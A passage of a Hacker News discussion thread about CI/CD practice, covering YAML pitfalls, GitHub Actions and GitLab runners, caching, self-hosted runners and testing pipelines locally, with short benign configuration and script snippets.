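# empty and DEBUG has silently become a key of the job itself
job:
  variables:
  DEBUG: "1"
  script: [./run.sh]
```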
dharmab 7 days ago [-]
1. The YAML spec is extremely complex, with some things being ambiguous. You might not notice this if you restrict yourself to a small subset of the language. But you will notice it when different YAML libraries and programming languages interpret the same YAML file as different content.
2. Trying to encode logic and control flow in a YAML document is much more difficult than writing that flow in a "real" programming language. Debugging is especially much easier in "real" languages.
maratc 7 days ago [-]
You can't put a breakpoint in YAML. You can't evaluate variables in YAML. You can't print debugging info from YAML. You can't rerun YAML from some point.
YAML is great for the happy-flow where everything works. It's absolutely terrible for any other flow.
int_19h 6 days ago [-]
FWIW there's no reason why you shouldn't be able to put a breakpoint in pipeline YAML. I'm not aware of anyone implementing such a thing, but a DAP adapter that VSCode could attach to remotely should be pretty straightforward.
MSBuild, for example, is all XML, but it has debugging support in Visual Studio complete with breakpoints and expression evaluation.
motorest 7 days ago [-]
> You can't put a breakpoint in YAML. You can't evaluate variables in YAML. You can't print debugging info from YAML. You can't rerun YAML from some point
It's a DSL. There is no execution, only configuration. The only thing that's executed are the custom scripts you create yourself, and any intro tutorial on the subject will eventually teach you that if you want to run anything beyond a single straightforward command then you should move those instructions to a shell script to make them testable and reproducible.
Things are so simple and straightforward that you need to go way out of your way to create your own problems.
I wonder how many people in this discussion are blaming the tools when they even bothered to learn the very basics.
maratc 7 days ago [-]
Your attitude of "how is everyone so stupid" does not help the discussion.
> It's a DSL. There is no execution, only configuration.
Jenkins pipelines are also DSL. I still can print out debugging information from them. "It's a DSL" is not an excuse for being a special case of shitty DSL.
> any intro tutorial on the subject will eventually teach you
Do these tutorials have a chapter on what to do when you join a company with 500 engineers and a ton of YAMLs that are not written in that way?
> you should move those instructions to a shell script to make them testable
Yeah, no. How am I supposed to test my script that is supposed to run on Github-supplied runner with a ton of injected secrets and Github-supplied JSON of 10,000 lines, when I don’t have the runner, the secrets, or the JSON?
dharmab 7 days ago [-]
> There is no execution, only configuration.
The YAML is fed into an agent which reads it to decide what to execute. Any time you change the control flow of a system by changing data, you are doing a form of programming.
fergie 7 days ago [-]
As a developer based in Norway, one fairly major drawback to YAML is the way that it processes the language code for Norwegian ("no").
LeonM 7 days ago [-]
The Norwegian ISO3166 code colliding with the English word 'no' is not a YAML problem per se, I've been bitten by that a few times in other situations as well.
For example: Stripe uses constants for types of tax registration numbers (VAT/GST/TIN, etc.). So there is EU_VAT for European VAT numbers, US_TIN for US tax identification numbers, etc. But what value to use for tax-exempt organisations that don't have a tax number? Well... guess how I found out about NO_VAT...
On the bright side, I did learn that way that although Norway is in the Schengen zone, apparently they are not part of the EU (hence the separation of EU_VAT and NO_VAT). I guess the 'no' name collision has taught many developers something about Norway :-)
marcusramberg 7 days ago [-]
That particular pain was fixed in yaml 1.2 :)
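Concretely (and quoting remains the safe habit, since you rarely control which parser version reads your file):

```yaml
# YAML 1.1 reads unquoted no/No/NO (and yes, on, off, ...) as booleans,
# so this list ends in `false`; YAML 1.2 reads it as the string "NO"
countries: [GB, IE, FR, NO]

# Unambiguous under either version:
countries_quoted: [GB, IE, FR, "NO"]
```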
withinboredom 7 days ago [-]
TIL that yaml has versions, and now I'm wondering what version of yaml parsers are running where. I think I might be on a new level of hell.
It would be better to delete your comment so nobody else ever has to have this crisis.
imp0cat 7 days ago [-]
Depends on the complexity of your pipeline.
alex_suzuki 7 days ago [-]
> * Always use your own runners, on-premise if possible
Why? I understand it in cases where security is critical or intellectual property is at stake. Are you talking about "snowflake runners" or just dumb executors of container images?
saidinesh5 7 days ago [-]
Caching is nicer on own runners. No need to redownload 10+GB of "development container images" just to build your 10 lines of changed code.
With self hosted Gitlab runners it was almost as fast as doing incremental builds. When your build process can take like 15-20 minutes (medium sized C++ code base), this brought down the total time to 30 seconds or so.
imp0cat 7 days ago [-]
This. Your own runners can cache everything (docker caches, apt caches, ccache outputs...) and can also share the compilation load (icecc for c++). All that gives 5x-10x speed boost.
madeofpalk 7 days ago [-]
This is true because your CI steps will be running on a lower number of physical machines, ensuring higher cache hits?
saidinesh5 7 days ago [-]
Kind of - you can also pin runners.("This workflow runs on this runner always"). And caching just means not deleting the artifacts from the file system from the previous runs.
Imagine building Android - even "cloning the sources" is 200GB of data transfer, build times are in hours. Not having to delete the previous sources and doing an incremental build saves a lot of everything.
imp0cat 1 days ago [-]
Gitlab also has some tips here: https://docs.gitlab.com/ci/caching/ on using shared caches, which can help in some scenarios, especially runners in Kubernetes that are ephemeral, ie. created just before a job starts and destroyed afterward.
tldr; "A cache is one or more files a job downloads and saves. Subsequent jobs that use the same cache don’t have to download the files again, so they execute more quickly."
It will probably still be slower than a dedicated runner, but possibly require less maintenance ("pet" runner vs "cattle" runner).
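The shared-cache pattern from those docs looks roughly like this (lockfile and path are examples for a Node project):

```yaml
build:
  script: ./ci/build.sh
  cache:
    key:
      files: [package-lock.json]   # cache invalidated when the lockfile changes
    paths: [node_modules/]
```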
deng 7 days ago [-]
It obviously depends on your load. Fast pipelines matter, so don't run them on some weak cloud runner with the speed of a C64. Fast cloud runners are expensive. Just invest some money and buy or at least rent some beefy servers with lots of cores, RAM and storage and never look back. Use caches for everything to speed up things.
Security is another thing where this can come in handy, but properly firewalling CI runners and having mirrors of all your dependencies is a lot of work and might very well be overkill for most people.
zoobab 7 days ago [-]
"Fast cloud runners are expensive."
Buy a cheap Ryzen, and put it on your desk, that's a cheap runner.
withinboredom 7 days ago [-]
30 bucks a month on hetzner for a dedicated machine with 12-16 cores and 64 gb of ram and unlimited 1gbps bandwidth.
crabbone 7 days ago [-]
Debugging and monitoring. When the runner is somewhere else and is shared, nobody is going to give you full access to the machine.
So many times I was biting my fingers not being able to figure out the problems GitHub runners were having with my actions and was unable to investigate.
7 days ago [-]
carlmr 6 days ago [-]
>Invest time that your pipelines can run locally on a developer machine as well (as much as possible at least), otherwise testing/debugging pipelines becomes a nightmare.
This so much. This ties into the previous point about using as much shell as possible. Additionally I'd say environment control via Docker/Nix, as well as modularizing the pipeline so you can restart it just before the point of failure instead of rerunning the whole business just to replay one little failure.
valenterry 7 days ago [-]
Amen.
To put the first 3 points into different words: you should treat the CI only as a tool that manages the interface and provides interaction with the outside world (including injecting secrets/configuration, setting triggers, storing caches etc.) and helps to visualize things.
Unfortunately, to do that, it puts constraints on how you can use it. Apart from that, no logic should live in the CI.
Tainnor 7 days ago [-]
> Write as much CI logic as possible in your own code. Does not really matter what you use (shell scripts, make, just, doit, mage, whatever) as long as it is proper, maintainable code.
To an extent, yes. There should be one command to build, one to run tests, etc.
But in many cases, you do actually want the pipeline functionality that something like Gitlab CI offers - having multiple jobs instead of a single one has many benefits (better/shorter retry behaviour, parallelisation, manual triggers, caching, reacting to specific repository hooks, running subsets of tests depending on the changed files, secrets in env vars, artifact publishing, etc.). It's at this point that it becomes almost unavoidable to use many of the configuration features including branching statements, job dependencies etc. and that's where it gets messy.
The problem is really that you're forced to do all of that in YAML instead of an actual programming language.
jordanbeiber 7 days ago [-]
We’ve gone full-on full-code.
Although we’re using temporal to schedule the workflows, we have a full-code typescript CI/CD setup.
We’ve been through them all starting with Jenkins ending with drone, until we realized that full-code makes it so much easier to maintain and share the work over the whole dev org.
No more yaml, code generating yaml, product quirk, groovy or DSLs!
bob1029 7 days ago [-]
> Write as much CI logic as possible in your own code
This has been my entire strategy since I've been able to do this:
Pulling the latest from git, running "dotnet build" and sending the artifacts to zip/S3 is now much easier than setting up and managing Jenkins et al. You also get the benefit of having 100% of your CI/CD pipeline under source control alongside the product.
In my last professional application of this (B2B/SaaS; customer hosts on-prem), we didn't even have to write the deployment piece. All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
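A hedged sketch of that kind of pipeline as one script (repo layout, bucket name and flags are all invented; `DRY_RUN=1` lets you rehearse it locally without dotnet or AWS credentials):

```shell
#!/bin/sh
# deploy.sh (hypothetical): pull, build, zip, upload -- kept in source
# control next to the product it ships.
set -eu

run() {
  if [ "${DRY_RUN:-0}" = "1" ]; then
    printf 'would run: %s\n' "$*"   # rehearsal mode: print instead of execute
  else
    "$@"
  fi
}

deploy() {
  run git pull --ff-only
  run dotnet build -c Release -o out
  run zip -r artifact.zip out
  run aws s3 cp artifact.zip s3://example-releases/artifact.zip
}

if [ "${1:-}" = "--run" ]; then
  deploy
fi
```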
ptx 7 days ago [-]
> All we needed to do was email the S3 zip link to the customer and they learned a quick procedure to extract it on the server each time.
My concern with this kind of deployment solution, where the customer is instructed to install software from links received in e-mails, is that someone else could very easily send them a link to a malicious installer and they would be hosed. E-mail is not authenticated (usually) and the sender can be forged.
I suppose you could use a shared OneDrive folder or something, which would be safer, as long as the customer doesn't rely on receiving the link to OneDrive by e-mail.
wvh 6 days ago [-]
I like the premise of something like Dagger, being an Actions CI that can run locally and uses Docker. I don't know if there's an up-and-coming "safe" open-source alternative that does not have that threat of a VC time bomb hanging over it.
Docker and to some extent, however unwieldy, Kubernetes at least allow you to run anywhere, anytime without locking you into a third party.
A "pipeline language" that can run anywhere, even locally, sets up dependency services and initial data, runs tests and avoids YAML overload would be a much needed addition to software engineering.
6 days ago [-]
cesnja 7 days ago [-]
You can build the first pipeline with oneliners, but as long as you want to keep optimizing the pipelines, the yaml code will keep piling up with CI vendor's specific approaches to job selection, env variable delivery, caching, output sharing between jobs and so on.
DanielHB 7 days ago [-]
Man, I tried this approach by making my builds dockerized; it turns out Docker layer caching is pretty slow in CI and adds a lot of overhead locally.
Do not recommend this approach (of using Docker for building).
adra 7 days ago [-]
Make builds in docker by mounting volumes and have your sources, intermediate files, caches, etc. in these volume mounts. Building a bunch of intermediate or incremental data IN the container every time you execute a new partial compile is insanity.
It's very satisfying to just compile an application with a super esoteric toolchain in Docker vs the nightmares of setting it up locally (and keeping it working over time).
DanielHB 7 days ago [-]
I had a project that had to build for macos, linux and windows on armv7, armv8 and x64 (and there were some talks about mips too). Just setting up all the stuff required to compile for all these target archs was a nightmare.
We used a single huge docker image with all the dependencies we needed to cross compile to all architectures. The image was around 1GB, it did its job but it was super slow on CI to pull it.
amadio 7 days ago [-]
I think this is good advice overall. I wrote a CMake script that does most of the heavy lifting for XRootD (see https://news.ycombinator.com/item?id=39657703). The CI is then a couple of lines, one to install the dependencies using the packaging tools, and another one calling that script. So don't underestimate the convenience that packaging can give you when installing dependencies.
Aeolun 7 days ago [-]
This is where I was going to say something about dagger, but it seems it turned into AI crud.
Let me at least recommend depot.dev for having absurdly fast runners.
shykes 7 days ago [-]
Hello! Dagger CEO here. We are indeed getting an influx of AI workloads (AI agents to be specific, which is the fancy industry term for "software with LLMs inside"), and are of course trying to capitalize on that in our marketing material. We're still looking for the right balance of CI and AI on our website. Crucially, it's the same engine running both. Because, as it turns out, AI agents are mostly workflows under the hood, and Dagger is great at running those.
can you give more feedback about dagger? what is good/not good about it? I was going to start looking into it
Aeolun 7 days ago [-]
I liked their setup before, though I never got around to actually using it, but the tagline on the website has changed to “AI powered workflow orchestration”, which is quite different from the original “Write pipeline once, run everywhere”
oulipo 6 days ago [-]
yes but I went on their Discord, and the AI thing is more an "extension" of the CI/CD thing, it's just marketing-speak for the investors, they are still building the CI/CD tool
toastal 7 days ago [-]
For starts looking at their website, it looks like all collaboration is locked behind proprietary platforms… Discord, Twitter, LinkedIn, Microsoft GitHub.
* Consider whether it's not easier to do away with CI in the cloud and just build locally on the dev's laptop
With fast laptops and Docker you can get perfectly reproducible builds and tests locally that are infinitely easier to debug. It works for us.
claytonjy 7 days ago [-]
How do you ensure what a dev builds and tags and pushes is coherent, meaning the tag matches the code commit it’s expected to?
I think builds must be possible locally, but i’d never rely on devs for the source of truth artifacts running in production, past a super early startup.
speleding 6 days ago [-]
You can add all kinds of verification scripts to git hooks that trigger before and after someone pushes, just like you do with GitHub Actions. Whether you trust your devs less than your build pipeline is an organizational question, but in our org only a few senior devs can merge to master.
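A minimal sketch of such a hook, saved as `.git/hooks/pre-push` (the branch name and allow-list are made up, and note that client-side hooks are advisory: a dev can skip them with `--no-verify`, so server-side protection is still needed):

```python
#!/usr/bin/env python3
"""Sketch of a client-side pre-push hook.

Git feeds one line per ref being pushed on stdin:
    <local ref> <local sha> <remote ref> <remote sha>
"""
import getpass
import sys

PROTECTED = "refs/heads/master"
ALLOWED_PUSHERS = {"alice", "bob"}  # hypothetical senior devs

def push_allowed(ref_line: str, user: str) -> bool:
    """Return False if this ref update targets master and user lacks access."""
    parts = ref_line.split()
    if len(parts) != 4:
        return True  # malformed line: let server-side checks decide
    _, _, remote_ref, _ = parts
    if remote_ref == PROTECTED and user not in ALLOWED_PUSHERS:
        return False
    return True

if __name__ == "__main__":
    user = getpass.getuser()
    for line in sys.stdin:
        if not push_allowed(line, user):
            sys.stderr.write(f"push to {PROTECTED} blocked for {user}\n")
            sys.exit(1)  # non-zero exit aborts the push
```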
ed_elliott_asc 7 days ago [-]
* print out the working directory and a directory listing every time
12_throw_away 7 days ago [-]
And the environment! (Also, don't put secrets in environment vars)
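A tiny preamble script along these lines covers both, without echoing credentials (the secret-name patterns are just guesses; tune them to your setup):

```python
#!/usr/bin/env python3
"""Minimal CI debug preamble: dump cwd, directory listing, and environment,
masking anything that looks like a secret."""
import os

SECRET_MARKERS = ("TOKEN", "SECRET", "KEY", "PASSWORD")

def masked_environ(env: dict) -> dict:
    """Replace values of suspicious-looking variables with '***'."""
    return {
        k: ("***" if any(m in k.upper() for m in SECRET_MARKERS) else v)
        for k, v in env.items()
    }

if __name__ == "__main__":
    print("cwd:", os.getcwd())
    print("files:", sorted(os.listdir(".")))
    for k, v in sorted(masked_environ(dict(os.environ)).items()):
        print(f"{k}={v}")
```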
WhyNotHugo 7 days ago [-]
If CI just installs some packages and runs `make check` (or something close), then it's going to be much much easier for others to run checks locally.
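E.g. a workflow roughly like this (package names are illustrative) keeps the interesting part in the Makefile, so `make check` runs identically on a laptop:

```yaml
# Sketch: CI is just "install packages, run make check".
name: ci
on: [push]
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: sudo apt-get update && sudo apt-get install -y build-essential
      - run: make check
```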
djha-skin 7 days ago [-]
I couldn't agree more, really. My whole career points to this as the absolute correct advice in CI.
fahhem 7 days ago [-]
Why use your own runners? If it's about cost, why not use a cheaper cloud like SonicInfra.com?
outofpaper 7 days ago [-]
Agree with everything except for the avoidance of YAML. What is your rationale for this?
neves 7 days ago [-]
How AWS Code Builder compares? I'm delving into AWS world now.
Kwpolska 7 days ago [-]
There are tradeoffs to that. If your CI logic is in shell scripts, you will probably get worse error reporting than the dedicated tasks from the CI tool (which hook into the build system, or which know how to parse logs).
agumonkey 7 days ago [-]
seconded, it was great to leverage hosted cicd at work, until we realized that local testing would now be handled differently..
as always, enough decoupling is useful
totaldude87 7 days ago [-]
Gitlab's search just sucks..
julik 6 days ago [-]
Seconded. Moreover...
> as long as it is proper, maintainable code
...in an imperative language you know well and which has a sufficient amount of type/null checking you can tolerate.
Ancalagon 7 days ago [-]
+1 for avoiding YAML at all costs
Also lol @deng
okayishdefaults 7 days ago [-]
[dead]
tobinfekkes 7 days ago [-]
This is the joy of HN, for me, at least. I'm genuinely fascinated to read that both GitHub Actions and DevOps are (apparently) so universally hated. I've been using both for many years, with barely a hiccup, and I actually really enjoy and value what they do. It would never have dawned on me, outside this thread, to think that so many people dislike it. Nice to see a different perspective!
Are the Actions a little cumbersome to set up and test? Sure. Is it a little annoying to have to make somewhat-useless commits just to re-trigger an Action to see if it works? Absolutely. But once it works, I just set it and forget it. I've barely touched my workflows in ~4 years, outside of the Node version updates.
Otherwise, I'm very pleased with both. My needs must just be simple enough to not run into these more complicated issues, I guess?
dathinab 7 days ago [-]
It really depends on what you do?
GitHub CI is designed in a way which tends to work well for
- languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
- relatively well contained project (e.g. one JS library, no mono repo stuff)
- no complex needs for integration tests
- no need for compliance enforcement stuff, especially not if it has to actually be securely enforced instead of just making it easier to comply then not to comply
- all developers having roughly the same permissions (ignore that some admin has more)
- fast CI
But the moment you step away from this, it falls apart more and more, and every company I have seen so far that doesn't fit the constraints above has nonstop issues with GitHub Actions.
But the worst part, which may be where a lot of the hatred comes from, is that it's cheap, maybe even free (if you pay for GitHub anyway), and it doesn't need an additional contract, billing, etc. No additional vetting of third-party companies, no managing your own CI service. So while it causes issues nonstop, it still initially seems like the "cheaper" solution for the company. And by the time your company realizes it's not, and has to set up its own GitHub runners, it probably still won't switch: the real cost only shows up if you properly account for dev time spent "fixing CI issues", and even then there is the sunk-cost fallacy, because you already spent so much time making GitHub Actions work and would have to port everything over. Also, realistically speaking, a lot of other CI solutions are only marginally better.
voxic11 7 days ago [-]
> no need for compliance enforcement stuff
I find github actions works very well for compliance. The ability to create attestations makes it easy to enforce policies about artifact provenance and integrity and was much easier to get working properly compared to my experience attempting to get jenkins to produce attestations.
They also work very well to leak all your secrets and infect people who download your software from pypi :D
tasuki 7 days ago [-]
> languages with no or very very cheap "compilation" steps (i.e. basically only scripting languages)
This is not true at all. It's fine with Haskell, just cache the dependencies to speed up the build...
dathinab 7 days ago [-]
except that
- GitHub Action cache and build artifact handling is a complete shit show (slow upload, slow download and a lot of practical subtle annoyances, finished off with sub-par integration in existing build systems)
- GitHub runners are comparatively small, so e.g. larger linker steps can already lead to pretty bad performance penalties
And sure, like I said, if your project is small it doesn't matter.
folmar 7 days ago [-]
I see the slow cache problem as universal. On a single-machine GitLab runner instance, the upload to the _local_ cache seems to take ages: a double-digit number of seconds for a 100 MB archive.
mystified5016 3 days ago [-]
GitLab drives me insane with this. My runner is on a 5 year old alienware desktop with an nvme ssd and all the trimmings but loading an uncompressed cache from the same local disk takes ten goddamn minutes. No matter what, all of my jobs take five to ten minutes just to start up.
ch4s3 6 days ago [-]
The caching is atrocious and seems to not correctly restore our cache randomly in parallel jobs in the same run. It’s the worst CI that I’ve ever used.
Marsymars 7 days ago [-]
> But the worst part, which maybe is where a lot of hatred comes from, is that it's there for cheap maybe even free (if you anyway pay for GitHub) and it doesn't need an additional contract, billing, etc.
Or even if you pay $$$ for big runners you can roll it onto your Azure bill rather than having to justify another SAAS service.
lolinder 7 days ago [-]
> Also, realistically speaking, a lot of other CI solutions are only marginally better.
This is the key point. Every CI system falls apart when you get too far from the happy path that you lay out above. I don't know if there's an answer besides giving up on CI all together.
jillesvangurp 7 days ago [-]
I use GH actions. You should treat it like all build systems: let them do what they are good at and nothing else. The rest should be shell scripts or separate docker containers. If it gets complicated, dumb it down to "run this script". Scripts are a lot easier to write and debug than thousands of lines of yaml doing god knows what.
The problem isn't GitHub Actions but people overloading their build and CI system with all sorts of custom crap. You'd have had a hard time doing the same thing twenty years ago with Ant and Hudson (Jenkins before the fork, after Oracle inherited it from Sun). And for the same reason: these systems simply aren't very good as a bash replacement.
If you don't know what Ant is: it was a popular build system for Java, before people moved the problem to Maven and then to Gradle (without solving it). I've dealt with Maven files that were trying to do all sorts of complicated things via plugins that would have amounted to two or three lines of bash. Gradle isn't any better. Ant at least used to have simple primitives for "doing" things, but you had to spell them out in XML form.
The point of all this, is that build & CI systems should mainly do simple things like building software. They shouldn't have a lot of conditional logic, custom side effects, and wonky things that may or may not happen depending on the alignment of the moon and stars. Debugging that stuff when it fails to work really sucks.
What helps with YAML is using YAML generators. I've used a Kotlin one for a while. Basically, you get autocomplete, syntactic sanity, and type checking, and if it compiles, it runs. It also makes it a lot easier to discover new parameters, plugin version updates, etc.
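The same idea works in any language. A sketch in Python (job and step names are made up): build the pipeline as plain data and serialize it. Since every JSON document is also valid YAML, the output can be dropped straight into `.github/workflows/ci.yml`:

```python
"""Generate a GitHub Actions workflow instead of hand-writing YAML."""
import json

def run_step(name: str, cmd: str) -> dict:
    """A typed-ish constructor beats copy-pasting YAML stanzas."""
    return {"name": name, "run": cmd}

def make_workflow() -> dict:
    return {
        "name": "ci",
        "on": {"push": {"branches": ["main"]}},
        "jobs": {
            "build": {
                "runs-on": "ubuntu-latest",
                "steps": [
                    {"uses": "actions/checkout@v4"},
                    run_step("test", "./ci/test.sh"),  # hypothetical script
                ],
            }
        },
    }

if __name__ == "__main__":
    # JSON output sidesteps YAML quirks like bare `on` being parsed as a boolean.
    print(json.dumps(make_workflow(), indent=2))
```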
motorest 7 days ago [-]
> I use GH actions. You should treat it like all build systems: let them do what they are good at and nothing else. The rest should be shell scripts or separate docker containers.
That's supposedly CICD 101. I don't understand why people in this thread seem to be missing this basic fact and instead they vent about irrelevant things like YAML.
You set your pipeline. You provide your own scripts. If a GitHub Action saves you time, you adopt it instead of reinventing the wheel. That's it.
This whole discussion reads like the bike fall meme.
int_19h 6 days ago [-]
If the sole purpose of GitHub Actions is to run a few shell scripts in order, why does it have expression evaluation, conditions, and dozens of stock actions other than `run`?
michaelmior 6 days ago [-]
I think one big benefit of being able to do this is getting more visibility into the pipeline from the GitHub Actions UI/API (including status checks in PR builds). It also helps with reusability. If something is packaged as a GitHub Action, it's much easier to reuse than a shell script written for some other project. GitHub Actions is far from perfect, but I think once you get used to it, it works pretty well.
motorest 6 days ago [-]
> If the sole purpose of GitHub Actions is to run a few shell scripts in order, why does it have expression evaluation, conditions, and dozens of stock actions other than `run`?
Judging by that comment, I'm not sure you ever went through even a basic intro to GitHub Actions tutorial.
Now that we've established that: GitHub Actions also supports custom actions, which are a way to create, share, and reuse high-level actions. Instead of copy-pasting stuff around, you do the equivalent of importing a third-party module.
Onboarding a custom GitHub Action does not prevent you from using steps.run.
I don't even know where to start regarding your comment on expression evaluation and conditions. Have you used a CICD system before?
The problem with half the comments in this thread railing against CICD in general, YAML, etc. is that they clearly don't have the faintest idea what they are doing, and are instead complaining about their own inability.
pepoluan 7 days ago [-]
People hate YAML because doing so makes them look cool and trendy. Just like Python-hating. Even if their 'hate' is misdirected.
I'm an experienced SaltStack user. If I found something I need is too complex to be described in YAML, I'll just write a custom module and/or state. Use YAML just to inform Salt what should happen, and shove the logic in the Python files.
People really should become generalists if they handle the plumbing.
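For example, a custom execution module is just a Python file dropped into `salt://_modules/` and synced with `saltutil.sync_modules`; the module name, function names, and version logic here are all made up, but they show where the logic lives instead of YAML:

```python
"""Sketch of a Salt custom execution module (e.g. _modules/deploytool.py)."""

def needs_restart(running_version: str, deployed_version: str) -> bool:
    """Pure decision logic lives here, not in YAML."""
    return running_version != deployed_version

def plan(running_version: str, deployed_version: str) -> dict:
    """Return a result dict in the shape states usually consume."""
    restart = needs_restart(running_version, deployed_version)
    return {
        "restart": restart,
        "comment": (
            f"restart required: {running_version} -> {deployed_version}"
            if restart else "versions match, nothing to do"
        ),
    }
```

The .sls file then just names the call; all the branching stays in testable Python.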
anonzzzies 7 days ago [-]
We see quite a lot of organisations from the inside because of the business we have, and while this is usually not our task, when I hear these stories and see people struggle with devops stuff in reality, the first thing we push for is to do anything to dumb it down and remove all the dependencies on 3rd-party providers, so we are back to having everything run again like, in this case, the hello world of GitHub Actions.

It is literally always the case that the people who complain have this (very HN, so funny you say that) thing of absolutely grossly overarchitecting and writing things that are just there because they read about them on HN/some subreddit/Discord. We sometimes walk into struggling teams and check the commits/setup, only to find out they did things like switch package manager/bundler/etc. 5x in the past year (this is definitely an HN thing, where a new package manager for JS pops up every 14 minutes). Another terrible thing: looking at 10+ year codebases, we see JS, TS, Python, Go, and Rust, and when we ask wtf, they tell us something something performance. Of course the language was never the bottleneck of these mostly LoB apps (people here would be pretty scared to see how bad the database setups are, even for multi-million-dollar departmental or enterprise-wide projects; the DBAs in the basement know, but they are not consulted for various reasons).

We only work for large companies, almost never startups, and these issues are usually departmental (because the big bad Java/Oracle IT in the basement doesn't allow anything, so departments have budgets to do their own), but still, it's scary how much money is being burnt on these lame new things that won't survive anyway.
IshKebab 7 days ago [-]
Sounds like you have the same pain points as everyone else; you're just more willing to ignore them.
I am with the author - we can do better than the status quo!
tobinfekkes 7 days ago [-]
I guess it's possible. But I also don't really have anything to ignore....? I genuinely never have an issue; it builds code, every time.
I commit code, push it, wait 45 seconds, it syncs to AWS, then all my sites periodically ping the S3 bucket for any changes, and download any new items. It's one of the most reliable pieces of my entire stack. It's comically consistent, compared to anything I try building for a mobile app or pushing to a mobile app store.
I look forward to opening my IDE to push code to the Actions for my web app, and I dread the build pipeline for a mobile app.
IshKebab 7 days ago [-]
> I genuinely never have an issue; it builds code, every time.
Well yeah because nobody is saying it isn't reliable. It's the setup stage that is painful. Once you've done it you can just leave it mostly.
I guess if your CI is very simple and always the same you are exposed to these issues less.
michaelmior 6 days ago [-]
> I dread the build pipeline for a mobile app.
I would recommend looking at Fastlane[0] if you haven't already.
You notice a deprecation warning in the logs, or an email from GitHub and you make a 1 line commit to bump the node version. Easy.
Sure, you can make typos that you don’t spot until you’ve pushed and the action doesn’t run, but I quickly learned to stop being lazy and actually think about what I’m writing, and to get someone else to do an actual review (not just scroll down and up and give it an LGTM).
My experience is same as the commenter above, it’s relatively set and forget. A few minutes setup work for hours and hours of benefit over years of builds.
ironmagma 7 days ago [-]
The non-solution solution, to simply downplay the issues instead of fixing them. You can solve almost anything this way, but also isn't it nice when things around you aren't universally slightly broken?
dkdbejwi383 7 days ago [-]
I guess I'd disagree that this is "slightly broken". That's just how it works. I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
IshKebab 7 days ago [-]
> That's just how it works.
It's how it works now. It doesn't have to forever. We can imagine a future in which it works in a better way. One that isn't so annoying.
> I don't think there's some universally perfect solution that magically just works all the time and never needs intervention or updating.
Again you seem to be confused as to what the issue is. Maintenance is not painful. Initial development is.
raffraffraff 7 days ago [-]
It probably depends on your org size and how specialised you are. Right now I dislike GitHub Actions and think that GitLab CI is way better, but I also don't give it too much thought, because it's a once-in-a-blue-moon task for me to mess with them. But I would absolutely hate to be a "100% DevOps guy" for a huge organisation that wants me to specialise in this stuff all the time. I think that by the end of week 1 I'd go mad.
Marsymars 7 days ago [-]
I don't mind it per se; to me the problem is then that some devs don't bother with basic debugging steps of CI failures - if anything works locally and fails in CI, their first step is to message me - so instead of being "100% DevOps" I spend a pile of time debugging other devs' local environments.
sgarland 7 days ago [-]
My favorite is when they post an absolutely massive error message, most of which is utterly unrelated, but also the answer to their problem is contained within it.
thom 7 days ago [-]
Unless I'm misunderstanding, you can use workflow_dispatch to avoid having to make useless commits to trigger actions.
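A minimal sketch (the input is made up); this adds a "Run workflow" button in the Actions tab and is also reachable via the API/CLI, with no empty commits needed:

```yaml
on:
  workflow_dispatch:
    inputs:
      environment:          # illustrative input
        description: "Target environment"
        required: false
        default: "staging"
```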
duped 7 days ago [-]
I have a small gripe that I think exemplifies a bigger problem. actions/upload-artifact strips executable permissions from binaries (1). The fact they fucked this up in the first place, and six years later haven't fixed it, gives me zero confidence in the team managing their platform. And when I'm picking a CI/CD service, I want reliability and correctness. GH has neither.
When it takes all of a day to self host your own task runner on a laptop in your office and have better uptime, lower cost, better performance, and more correct implementations, you have to ask why anyone chooses GHA. I guess the hello-world is convincing enough for some people.
You must have a simple, straightforward flow touched only by a handful of folks, max.
The world is full of kafkaesque nightmares: DevOps pipelines "designed" and maintained by committees of people.
It's horrible.
That said, for some personal stuff I have Google Cloud Build, which has a very, VERY simple flow. Fire and forget; it's been good.
eru 6 days ago [-]
You might like 'git commit --allow-empty' to make your somewhat-useless commits.
But honestly, doesn't github now have a button you can press to retrigger actions without a commit?
GitHub Actions are least hassle, when you don't care about how much compute time you are burning through. Either because you are using the free-for-open-source repositories version, or because your company doesn't care about the cost.
If you care about the compute time you are burning, then you can configure them enough to help with that, but it quickly becomes a major hassle.
ImHereToVote 7 days ago [-]
GitHub actions is nice. People are just not accustomed to being punched in the face. The stuff I work on regularly makes GitHub actions seem like a Hello World app.
trevor-e 7 days ago [-]
I thought the same until having to do slightly more complicated and "off the beaten path" workflows. I'm still amazed at how easy they make building CI jobs now, but I also get frustrated at how it's not a "local first" workflow that you then push to their service.
tasuki 7 days ago [-]
Yes, your needs are simple. I've also been using GitHub actions for all my needs since Travis shut down and haven't run into any problems.
I wouldn't want to maintain GitHub actions for a large project involving 50 people and 5 languages...
flanked-evergl 7 days ago [-]
Software engineering thrives on iteration speed. Things have to change, and if your pipeline is difficult to change, it will cost you.
motorest 7 days ago [-]
[dead]
xlii 7 days ago [-]
There is one thing that I haven’t seen mentioned: worst possible feedback loop.
I’ve noticed this phenomenon a few times already, and I think there’s nothing worse than a 30-60s feedback loop: the kind that keeps you glued to the screen but is otherwise completely nonproductive.
I tried for many moons to replicate GHA environment on local and it’s impossible in my context. So every change is like „push, wait for GH to pickup, act on some stupid typo or inconsistency, rinse, repeat”.
It’s like a slot machine „just one more time and it will run”, eating away focus and time.
It took me 25 minutes to get a 5-second build process. A naive build with GHA? 3 minutes, because of dependencies et al. OK, let’s add caching. 10 hours fly by.
The cost of failure and focus drop is enormous.
kelseydh 7 days ago [-]
Feel this pain so much. If you are debugging GitHub Actions container builds, and each takes ~40 minutes, you can burn through a whole work day testing only six or seven changes.
There has to be a better way. How has nobody figured this out?
elAhmo 7 days ago [-]
There is act, which allows you to run actions locally. Although it's not exactly the same as the real thing, it can save time.
In an organization setting this is almost useless if you use (or are forced to use) pre-made actions and/or actions that are internal to your organization (they cannot be downloaded). It's also useless if you are forced to use a self-hosted runner with an image you don't have access to. Not to mention env/secrets and networking...
terminalbraid 7 days ago [-]
This is a great tool, but I always cringe when something so important comes from a third party
cantagi 7 days ago [-]
act is brilliant - it really helps iterate on github or gitea actions locally.
esafak 7 days ago [-]
There's dagger; CI as code. Test your pipeline locally, in your IDE.
I wish GitLab/GitHub would provide a way to do this by default, though.
cantagi 7 days ago [-]
act is great. I use it to iterate on actions locally (I self-host gitea actions, which uses act, so it's identical to github actions).
lsuresh 7 days ago [-]
